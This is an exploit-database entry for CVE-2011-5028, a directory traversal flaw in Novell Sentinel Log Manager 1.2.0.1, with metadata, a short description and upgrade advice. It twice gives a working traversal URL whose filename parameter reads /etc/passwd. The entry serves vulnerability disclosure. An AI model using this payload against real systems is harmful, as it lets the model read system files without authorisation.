header-logo
Suggest Exploit
vendor:
Sentinel Log Manager
by:
Andrea Fabrizi
4,3
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Sentinel Log Manager
Affected Version From: <= 1.2.0.1
Affected Version To: <= 1.2.0.1
Patch Exists: YES
Related CWE: CVE-2011-5028
CPE: a:novell:sentinel_log_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Sentinel Log Manager Appliance 1.2.0.1
2011

Novell Sentinel Log Manager directory traversal

The latest version of Sentinel Log Manager is prone to a Directory Traversal, which makes it possible, for Authenticated Users, to access any system file. Testing environment: Sentinel Log Manager Appliance 1.2.0.1 Vulnerable URL: /novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

Mitigation:

Upgrade to the latest version of Sentinel Log Manager
Source

Exploit-DB raw data:

# Exploit Title: Novell Sentinel Log Manager directory traversal
# Date: 2011-12-18
# Exploit Author: Andrea Fabrizi
# Vendor Homepage: http://www.novell.com/
# Version: <= 1.2.0.1
# Tested on: Sentinel Log Manager Appliance 1.2.0.1
# CVE: 2011-5028

The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.

Testing environment: Sentinel Log Manager Appliance 1.2.0.1

Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd

BID: https://www.securityfocus.com/bid/51104/info
CVE-2011-5028: http://www.cvedetails.com/cve/CVE-2011-5028